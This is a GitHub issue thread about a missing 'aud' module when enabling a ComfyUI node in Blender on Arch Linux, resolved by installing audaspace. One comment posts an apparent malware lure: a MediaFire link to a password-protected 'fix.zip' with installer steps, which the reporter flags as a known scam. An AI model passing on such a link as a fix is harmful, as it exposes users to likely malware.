### ISSUE TITLE
Error "No module named 'aud'" while trying to enable ComfyUI Node, Arch Linux on AMD themed pc

### ISSUE THREAD

**Issue by rairay91** [AIGODLIKE/ComfyUI-BlenderAI-node#124]
I am on Garuda KDE which is 100% Arch +KDE.
Here is the screen recording of what happen-

https://github.com/user-attachments/assets/aff3b02b-dff1-4de3-b0c0-a6200e028cf7

I have used on browser, ComfyUI working just fine.
I have also used with Krita, working out of the box.
Issue is with blender only.

Here is the info about my system spec-
![Screenshot_20240826_193552](https://github.com/user-attachments/assets/37ff51b5-67fb-43ff-8861-ee213ac96819)

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rairay91** [comment]
@abdulhkeemGit i am reporting you on github. Because your (In the installer menu, select "gcc.") is being mentioned on internet for being spam/scam.

**Comment by rairay91** [comment]
Wow! That's intersting. When i setup comfyui-blender-node on either host arch linux or arch linux container using distrobox i get this error "nomodule namde 'aud'" while trying to activate comfyui-blender-node in blender. But when i setup everythong in ubuntu 24 distrobox container it just works out of the box.

**Comment by cickpea** [comment]
install audaspace using pacman:

`sudo pacman -S audaspace`

**Comment by rairay91** [comment]
OK, I thought it was aud. I was trying sudo pacman -S aud/aud-python/python-aud. Anyway I will try that.

**Comment by rairay91** [comment]
That worked. Thanks for help.
